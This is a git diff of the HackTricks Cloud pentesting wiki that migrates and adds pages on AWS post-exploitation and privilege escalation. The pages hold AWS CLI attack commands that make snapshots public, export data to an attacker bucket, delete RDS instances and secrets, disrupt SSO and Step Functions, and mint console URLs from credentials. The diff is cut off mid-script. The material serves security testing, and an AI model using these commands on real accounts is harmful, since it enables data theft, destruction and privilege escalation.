-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## RDS For more information check: -{% content-ref url="../aws-services/aws-relational-database-rds-enum.md" %} -[aws-relational-database-rds-enum.md](../aws-services/aws-relational-database-rds-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-relational-database-rds-enum.md +{{#endref}} ### `rds:CreateDBSnapshot`, `rds:RestoreDBInstanceFromDBSnapshot`, `rds:ModifyDBInstance` @@ -59,7 +46,6 @@ An attacker with these permissions could **create an snapshot of a DB** and make If the attacker **doesn't have the `rds:CreateDBSnapshot`**, he still could make **other** created snapshots **public**. -{% code overflow="wrap" %} ```bash # create snapshot aws rds create-db-snapshot --db-instance-identifier --db-snapshot-identifier @@ -68,17 +54,14 @@ aws rds create-db-snapshot --db-instance-identifier --d aws rds modify-db-snapshot-attribute --db-snapshot-identifier --attribute-name restore --values-to-add all ## Specify account IDs instead of "all" to give access only to a specific account: --values-to-add {"111122223333","444455556666"} ``` -{% endcode %} ### `rds:DownloadDBLogFilePortion` An attacker with the `rds:DownloadDBLogFilePortion` permission can **download portions of an RDS instance's log files**. If sensitive data or access credentials are accidentally logged, the attacker could potentially use this information to escalate their privileges or perform unauthorized actions. -{% code overflow="wrap" %} ```bash aws rds download-db-log-file-portion --db-instance-identifier target-instance --log-file-name error/mysql-error-running.log --starting-token 0 --output text ``` -{% endcode %} **Potential Impact**: Access to sensitive information or unauthorized actions using leaked credentials. 
@@ -86,42 +69,24 @@ aws rds download-db-log-file-portion --db-instance-identifier target-instance -- An attacker with these permissions can **DoS existing RDS instances**. -{% code overflow="wrap" %} ```bash # Delete aws rds delete-db-instance --db-instance-identifier target-instance --skip-final-snapshot ``` -{% endcode %} **Potential impact**: Deletion of existing RDS instances, and potential loss of data. ### `rds:StartExportTask` -{% hint style="info" %} -TODO: Test -{% endhint %} +> [!NOTE] +> TODO: Test An attacker with this permission can **export an RDS instance snapshot to an S3 bucket**. If the attacker has control over the destination S3 bucket, they can potentially access sensitive data within the exported snapshot. -{% code overflow="wrap" %} ```bash aws rds start-export-task --export-task-identifier attacker-export-task --source-arn arn:aws:rds:region:account-id:snapshot:target-snapshot --s3-bucket-name attacker-bucket --iam-role-arn arn:aws:iam::account-id:role/export-role --kms-key-id arn:aws:kms:region:account-id:key/key-id ``` -{% endcode %} **Potential impact**: Access to sensitive data in the exported snapshot. -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.md similarity index 51% rename from pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.md rename to src/pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.md index ba908badb..803b6a14d 100644 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.md @@ -1,27 +1,14 @@ # AWS - S3 Post Exploitation -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## S3 For more information check: -{% content-ref url="../aws-services/aws-s3-athena-and-glacier-enum.md" %} -[aws-s3-athena-and-glacier-enum.md](../aws-services/aws-s3-athena-and-glacier-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-s3-athena-and-glacier-enum.md +{{#endref}} ### Sensitive Information @@ -48,17 +35,4 @@ Finally, the attacker could upload a final file, usually named "ransom-note.txt, **For more info** [**check the original research**](https://rhinosecuritylabs.com/aws/s3-ransomware-part-1-attack-vector/)**.** -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md new file mode 100644 index 000000000..7560dd6c5 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md @@ -0,0 +1,49 @@ +# AWS - Secrets Manager Post Exploitation + +{{#include ../../../banners/hacktricks-training.md}} + +## Secrets Manager + +For more information check: + +{{#ref}} +../aws-services/aws-secrets-manager-enum.md +{{#endref}} + +### Read Secrets + +The **secrets themself are sensitive information**, [check the privesc page](../aws-privilege-escalation/aws-secrets-manager-privesc.md) to learn how to read them. + +### DoS Change Secret Value + +Changing the value of the secret you could **DoS all the system that depends on that value.** + +> [!WARNING] +> Note that previous values are also stored, so it's easy to just go back to the previous value. + +```bash +# Requires permission secretsmanager:PutSecretValue +aws secretsmanager put-secret-value \ + --secret-id MyTestSecret \ + --secret-string "{\"user\":\"diegor\",\"password\":\"EXAMPLE-PASSWORD\"}" +``` + +### DoS Change KMS key + +```bash +aws secretsmanager update-secret \ + --secret-id MyTestSecret \ + --kms-key-id arn:aws:kms:us-west-2:123456789012:key/EXAMPLE1-90ab-cdef-fedc-ba987EXAMPLE +``` + +### DoS Deleting Secret + +The minimum number of days to delete a secret are 7 + +```bash +aws secretsmanager delete-secret \ + --secret-id MyTestSecret \ + --recovery-window-in-days 7 +``` + +{{#include ../../../banners/hacktricks-training.md}} 
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md
new file mode 100644
index 000000000..157ea2e24
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md
@@ -0,0 +1,83 @@ +# AWS - SES Post Exploitation + +{{#include ../../../banners/hacktricks-training.md}} + +## SES + +For more information check: + +{{#ref}} +../aws-services/aws-ses-enum.md +{{#endref}} + +### `ses:SendEmail` + +Send an email. + +```bash +aws ses send-email --from sender@example.com --destination file://emails.json --message file://message.json +aws sesv2 send-email --from sender@example.com --destination file://emails.json --message file://message.json +``` + +Still to test. + +### `ses:SendRawEmail` + +Send an email. + +```bash +aws ses send-raw-email --raw-message file://message.json +``` + +Still to test. + +### `ses:SendTemplatedEmail` + +Send an email based on a template. + +```bash +aws ses send-templated-email --source --destination --template +``` + +Still to test. + +### `ses:SendBulkTemplatedEmail` + +Send an email to multiple destinations + +```bash +aws ses send-bulk-templated-email --source --template +``` + +Still to test. + +### `ses:SendBulkEmail` + +Send an email to multiple destinations. + +``` +aws sesv2 send-bulk-email --default-content --bulk-email-entries +``` + +### `ses:SendBounce` + +Send a **bounce email** over a received email (indicating that the email couldn't be received). This can only be done **up to 24h after receiving** the email. + +```bash +aws ses send-bounce --original-message-id --bounce-sender --bounced-recipient-info-list +``` + +Still to test. + +### `ses:SendCustomVerificationEmail` + +This will send a customized verification email. You might need permissions also to created the template email. + +```bash +aws ses send-custom-verification-email --email-address --template-name +aws sesv2 send-custom-verification-email --email-address --template-name +``` + +Still to test. + +{{#include ../../../banners/hacktricks-training.md}} 
diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.md similarity index 52% rename from pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.md rename to src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.md index 7492acfd1..39017f43d 100644 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.md @@ -1,27 +1,14 @@ # AWS - SNS Post Exploitation -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## SNS For more information: -{% content-ref url="../aws-services/aws-sns-enum.md" %} -[aws-sns-enum.md](../aws-services/aws-sns-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-sns-enum.md +{{#endref}} ### Disrupt Messages @@ -51,11 +38,9 @@ aws sns publish --topic-arn --message An attacker could modify the attributes of an SNS topic, potentially affecting its performance, security, or availability. -{% code overflow="wrap" %} ```bash aws sns set-topic-attributes --topic-arn --attribute-name --attribute-value ``` -{% endcode %} **Potential Impact**: Misconfigurations leading to degraded performance, security issues, or reduced availability. @@ -63,12 +48,10 @@ aws sns set-topic-attributes --topic-arn --attribute-name --attr An attacker could subscribe or unsubscribe to an SNS topic, potentially gaining unauthorized access to messages or disrupting the normal functioning of applications relying on the topic. -{% code overflow="wrap" %} ```bash aws sns subscribe --topic-arn --protocol --endpoint aws sns unsubscribe --subscription-arn ``` -{% endcode %} **Potential Impact**: Unauthorized access to messages, service disruption for applications relying on the affected topic. 
@@ -87,26 +70,11 @@ aws sns remove-permission --topic-arn --label An attacker could add, modify, or remove tags from SNS resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags. -{% code overflow="wrap" %} ```bash aws sns tag-resource --resource-arn --tags Key=,Value= aws sns untag-resource --resource-arn --tag-keys ``` -{% endcode %} **Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies. -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md similarity index 55% rename from pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md rename to src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md index 09584ee40..ad1073251 100644 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md @@ -1,27 +1,14 @@ # AWS - SQS Post Exploitation -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## SQS For more information check: -{% content-ref url="../aws-services/aws-sqs-and-sns-enum.md" %} -[aws-sqs-and-sns-enum.md](../aws-services/aws-sqs-and-sns-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-sqs-and-sns-enum.md +{{#endref}} ### `sqs:SendMessage` , `sqs:SendMessageBatch` @@ -97,17 +84,4 @@ arduinoCopy codeaws sqs remove-permission --queue-url --label **Potential Impact**: Disruption of normal functioning for applications relying on the queue due to unauthorized removal of permissions. -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md new file mode 100644 index 000000000..1b02581d6 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md @@ -0,0 +1,25 @@ +# AWS - SSO & identitystore Post Exploitation + +{{#include ../../../banners/hacktricks-training.md}} + +## SSO & identitystore + +For more information check: + +{{#ref}} +../aws-services/aws-iam-enum.md +{{#endref}} + +### `sso:DeletePermissionSet` | `sso:PutPermissionsBoundaryToPermissionSet` | `sso:DeleteAccountAssignment` + +These permissions can be used to disrupt permissions: + +```bash +aws sso-admin delete-permission-set --instance-arn --permission-set-arn + +aws sso-admin put-permissions-boundary-to-permission-set --instance-arn --permission-set-arn --permissions-boundary-policy-arn + +aws sso-admin delete-account-assignment --instance-arn --target-id --target-type --permission-set-arn --principal-type --principal-id +``` + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md new file mode 100644 index 000000000..4a26196b2 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md 
@@ -0,0 +1,74 @@ +# AWS - Step Functions Post Exploitation + +{{#include ../../../banners/hacktricks-training.md}} + +## Step Functions + +For more information about this AWS service, check: + +{{#ref}} +../aws-services/aws-stepfunctions-enum.md +{{#endref}} + +### `states:RevealSecrets` + +This permission allows to **reveal secret data inside an execution**. For it, it's needed to set Inspection level to TRACE and the revealSecrets parameter to true. + +
+
+### `states:DeleteStateMachine`, `states:DeleteStateMachineVersion`, `states:DeleteStateMachineAlias`
+
+An attacker with these permissions would be able to permanently delete state machines, their versions, and aliases. This can disrupt critical workflows, result in data loss, and require significant time to recover and restore the affected state machines. In addition, it would allow an attacker to cover the tracks used, disrupt forensic investigations, and potentially cripple operations by removing essential automation processes and state configurations.
+
+> [!NOTE]
+>
+> - Deleting a state machine you also delete all its associated versions and aliases.
+> - Deleting a state machine alias you do not delete the state machine versions referecing this alias.
+> - It is not possible to delete a state machine version currently referenced by one o more aliases.
+
+```bash
+# Delete state machine
+aws stepfunctions delete-state-machine --state-machine-arn
+# Delete state machine version
+aws stepfunctions delete-state-machine-version --state-machine-version-arn
+# Delete state machine alias
+aws stepfunctions delete-state-machine-alias --state-machine-alias-arn
+```
+
+- **Potential Impact**: Disruption of critical workflows, data loss, and operational downtime.
+
+### `states:UpdateMapRun`
+
+An attacker with this permission would be able to manipulate the Map Run failure configuration and parallel setting, being able to increase or decrease the maximum number of child workflow executions allowed, affecting directly and performance of the service. In addition, an attacker could tamper with the tolerated failure percentage and count, being able to decrease this value to 0 so every time an item fails, the whole map run would fail, affecting directly to the state machine execution and potentially disrupting critical workflows.
+
+```bash
+aws stepfunctions update-map-run --map-run-arn [--max-concurrency ] [--tolerated-failure-percentage ] [--tolerated-failure-count ]
+```
+
+- **Potential Impact**: Performance degradation, and disruption of critical workflows.
+
+### `states:StopExecution`
+
+An attacker with this permission could be able to stop the execution of any state machine, disrupting ongoing workflows and processes. This could lead to incomplete transactions, halted business operations, and potential data corruption.
+
+> [!WARNING]
+> This action is not supported by **express state machines**.
+
+```bash
+aws stepfunctions stop-execution --execution-arn [--error ] [--cause ]
+```
+
+- **Potential Impact**: Disruption of ongoing workflows, operational downtime, and potential data corruption.
+
+### `states:TagResource`, `states:UntagResource`
+
+An attacker could add, modify, or remove tags from Step Functions resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags.
+
+```bash
+aws stepfunctions tag-resource --resource-arn --tags Key=,Value=
+aws stepfunctions untag-resource --resource-arn --tag-keys
+```
+
+**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies.
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md
similarity index 54%
rename from pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md
rename to src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md
index 7a03ece8e..c1023dc7b 100644
--- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md
@@ -1,27 +1,14 @@
 # AWS - STS Post Exploitation
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## STS For more information: -{% content-ref url="../aws-services/aws-iam-enum.md" %} -[aws-iam-enum.md](../aws-services/aws-iam-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-iam-enum.md +{{#endref}} ### From IAM Creds to Console @@ -32,7 +19,6 @@ Note that the the user/role must have the permission **`sts:GetFederationToken`* The following script will use the default profile and a default AWS location (not gov and not cn) to give you a signed URL you can use to login inside the web console: -{% code overflow="wrap" %} ```bash # Get federated creds (you must indicate a policy or they won't have any perms) ## Even if you don't have Admin access you can indicate that policy to make sure you get all your privileges @@ -69,11 +55,10 @@ signin_token=$(echo -n $resp | jq -r '.SigninToken' | tr -d '\n' | jq -sRr @uri) # Give the URL to login echo -n "https://signin.aws.amazon.com/federation?Action=login&Issuer=example.com&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2F&SigninToken=$signin_token" ``` -{% endcode %} -#### aws\_consoler +#### aws_consoler -You can **generate a web console link** with [https://github.com/NetSPI/aws\_consoler](https://github.com/NetSPI/aws_consoler). +You can **generate a web console link** with [https://github.com/NetSPI/aws_consoler](https://github.com/NetSPI/aws_consoler). ```bash cd /tmp @@ -83,9 +68,8 @@ pip install aws-consoler aws_consoler [params...] #This will generate a link to login into the console ``` -{% hint style="warning" %} -Ensure the IAM user has `sts:GetFederationToken` permission, or provide a role to assume. -{% endhint %} +> [!WARNING] +> Ensure the IAM user has `sts:GetFederationToken` permission, or provide a role to assume. #### aws-vault 
@@ -97,15 +81,13 @@ aws-vault exec jonsmith -- aws s3 ls # Execute aws cli with jonsmith creds aws-vault login jonsmith # Open a browser logged as jonsmith ``` -{% hint style="info" %} -You can also use **aws-vault** to obtain an **browser console session** -{% endhint %} +> [!NOTE] +> You can also use **aws-vault** to obtain an **browser console session** ### **Bypass User-Agent restrictions from Python** If there is a **restriction to perform certain actions based on the user agent** used (like restricting the use of python boto3 library based on the user agent) it's possible to use the previous technique to **connect to the web console via a browser**, or you could directly **modify the boto3 user-agent** by doing: -{% code overflow="wrap" %} ```bash # Shared by ex16x41 # Create a client @@ -118,19 +100,5 @@ client.meta.events.register( 'before-call.secretsmanager.GetSecretValue', lambda # Perform the action response = client.get_secret_value(SecretId="flag_secret") print(response['SecretString']) ``` -{% endcode %} -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md
new file mode 100644
index 000000000..d39f99060
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md
@@ -0,0 +1,13 @@
+# AWS - VPN Post Exploitation
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## VPN
+
+For more information:
+
+{{#ref}}
+../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/
+{{#endref}}
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/README.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/README.md
new file mode 100644
index 000000000..f795302bc
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/README.md
@@ -0,0 +1,23 @@
+# AWS - Privilege Escalation
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## AWS Privilege Escalation
+
+The way to escalate your privileges in AWS is to have enough permissions to be able to, somehow, access other roles/users/groups privileges. Chaining escalations until you have admin access over the organization.
+
+> [!WARNING]
+> AWS has **hundreds** (if not thousands) of **permissions** that an entity can be granted. In this book you can find **all the permissions that I know** that you can abuse to **escalate privileges**, but if you **know some path** not mentioned here, **please share it**.
+
+> [!CAUTION]
+> If an IAM policy has `"Effect": "Allow"` and `"NotAction": "Someaction"` indicating a **resource**... that means that the **allowed principal** has **permission to do ANYTHING but that specified action**.\
+> So remember that this is another way to **grant privileged permissions** to a principal.
+
+**The pages of this section are ordered by AWS service. In there you will be able to find permissions that will allow you to escalate privileges.**
+
+## Tools
+
+- [https://github.com/RhinoSecurityLabs/Security-Research/blob/master/tools/aws-pentest-tools/aws_escalate.py](https://github.com/RhinoSecurityLabs/Security-Research/blob/master/tools/aws-pentest-tools/aws_escalate.py)
+- [Pacu](https://github.com/RhinoSecurityLabs/pacu)
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md
similarity index 59%
rename from pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md
rename to src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md
index fb13f3276..297789085 100644
--- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md
@@ -1,27 +1,14 @@
 # AWS - Apigateway Privesc
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Apigateway For more information check: -{% content-ref url="../aws-services/aws-api-gateway-enum.md" %} -[aws-api-gateway-enum.md](../aws-services/aws-api-gateway-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-api-gateway-enum.md +{{#endref}} ### `apigateway:POST` @@ -48,25 +35,21 @@ aws --region apigateway get-api-key --api-key --include-value With these permissions it's possible to modify the resource policy of an API to give yourself access to call it and abuse potential access the API gateway might have (like invoking a vulnerable lambda). -{% code overflow="wrap" %} ```bash aws apigateway update-rest-api \ --rest-api-id api-id \ --patch-operations op=replace,path=/policy,value='"{\"jsonEscapedPolicyDocument\"}"' ``` -{% endcode %} **Potential Impact:** You, usually, won't be able to privesc directly with this technique but you might get access to sensitive info. ### `apigateway:PutIntegration`, `apigateway:CreateDeployment`, `iam:PassRole` -{% hint style="info" %} -Need testing -{% endhint %} +> [!NOTE] +> Need testing An attacker with the permissions `apigateway:PutIntegration`, `apigateway:CreateDeployment`, and `iam:PassRole` can **add a new integration to an existing API Gateway REST API with a Lambda function that has an IAM role attached**. The attacker can then **trigger the Lambda function to execute arbitrary code and potentially gain access to the resources associated with the IAM role**. -{% code overflow="wrap" %} ```bash API_ID="your-api-id" RESOURCE_ID="your-resource-id" 
